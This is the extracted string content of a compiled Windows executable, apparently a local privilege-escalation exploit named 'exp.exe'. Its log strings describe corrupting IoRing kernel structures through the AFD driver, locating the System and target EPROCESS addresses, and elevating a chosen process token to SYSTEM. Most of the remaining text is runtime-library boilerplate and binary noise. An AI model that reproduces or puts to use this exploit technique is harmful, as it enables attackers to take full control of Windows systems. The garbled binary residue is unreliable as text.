!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@_RDATA
@.reloc
L$ SVWH
|$ UAVAWH
AfdOE3
fD9<Xu
t H9-=(
t$ WAVAWH
\$Xfff
0A_A^_
@SUVAVH
H3E H3E
u0HcH<H
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
H;xXu5
ffffff
fffffff
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
B(I9A(u
SVWATAUAVAWH
0A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
0A_A^A]A\_
S(HcS0
S(HcS0
S(HcS0
x UAVAWH
D$@H;F
kL@8o(u
<htl<jt\<lt4<tt$<wt
UWATAVAWH
A_A^A\_]
WAVAWH
A_A^_
WATAUAVAWH
0A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
UVWAVAWH
0A_A^_^]
p0R^G'
u3HcH<H
WAVAWH
A_A^_
WAVAWH
A_A^_
D$0@8{
p*W4H
p*W4H
WATAUAVAWH
A_A^A]A\_
p0R^G'
L$ VWAVH
fD9t$b
t$ WATAUAVAWH
gfffffffH
A_A^A]A\_
{ AUAVAWH
0A_A^A]
t$xt*3
WAVAWH
A_A^_
x ATAVAWH
A_A^A\
L$ VWAVH
fD94H}aD
u$D8r(t
D81uUL9r
uED8r(t
vAD8s(t
u$D8r(t
fD91uTL9r
uED8r(t
v@D8s(t
UVWATAUAVAWH
PA_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H9>u+A
@USVWATAUAVH
D8t$ht
D8t$ht
A^A]A\_^[]
f9)u4H9j
u%@8j(t
l$ VWATAVAWH
L$&8\$&t,8Y
A_A^A\_^
UVWATAUAVAWH
xWI96tRI
0A_A^A]A\_^]
@UATAUAVAWH
e0A_A^A]A\]
t$ WATAUAVAWH
D!|$xA
A_A^A]A\_
WAVAWH
A_A^_
UVWATAUAVAWH
fB9<I}1L
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
VATAUAVAWH
0A_A^A]A\^
@USVWATAUAVAWH
H!D$ H
xA_A^A]A\_^[]
SUVWATAVAWH
A_A^A\_^][
@USVWATAVAWH
A_A^A\_^[]
WATAUAVAWH
0A_A^A]A\_
D$0H9D$8
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
@UATAUAVAWH
A_A^A]A\]
x UAVAWH
VATAUAVAWH
0A_A^A]A\^
ffffff
fffffff
@SUVWATAVAWH
@A_A^A\_^][
@USVWATAUAVAWH
eHA_A^A]A\_^[]
ATAVAWH
A_A^A\
USVWAVH
A^_^[]
LcA<E3
u HcA<H
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
Unknown exception
bad exception
(null)
CorExitProcess
AreFileApisANSI
CompareStringEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
UUUUUU
UUUUUU
=imb;D
/>58d%
VM >cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
NtCreateFile
ntdll.dll
NtDeviceIoControlFile
NtCreateIoCompletion
NtSetIoCompletion
NtQuerySystemInformation
usage:
exp.exe <pid>
[!] Attempting to elevate pid %i
[-] Failed to get address of NT functions: %0x
[-] IORING setup failed: %0x
[+] IoRing Obj Address at %llx
[-] IoRing->RegBuffers overwrite failed: %0x
[+] IoRing->RegBuffers overwritten with address 0x1000000
[-] IoRing->RegBuffersCount overwrite failed: %0x
[+] IoRing->RegBuffersCount overwritten with 0x1
[-] LPE Failed: %0x
[+] Target process token elevated to SYSTEM!
[+] System EPROC address: %llx
[+} Target process EPROC address: %llx
[+] System token is at: %llx
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
VirtualFree
VirtualAlloc
GetModuleHandleA
CreateEventW
GetLastError
CloseHandle
GetProcAddress
ReadFile
BuildIoRingReadFile
HeapFree
WriteFile
CreateNamedPipeW
CreateFileW
OpenProcess
HeapReAlloc
HeapAlloc
SubmitIoRing
GetCurrentProcessId
GetProcessHeap
PopIoRingCompletion
BuildIoRingWriteFile
CreateIoRing
KERNEL32.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
RtlUnwindEx
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
EncodePointer
RaiseException
RtlPcToFileHeader
GetStdHandle
GetModuleFileNameW
ExitProcess
GetModuleHandleExW
GetCommandLineA
GetCommandLineW
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
CompareStringW
LCMapStringW
GetFileType
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
SetStdHandle
GetStringTypeW
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
GetFileSizeEx
SetFilePointerEx
HeapSize
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
mscoree.dll
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-4
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernelbase
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
\Device\Afd\Endpoint
\\.\pipe\ioring_in
\\.\pipe\ioring_out
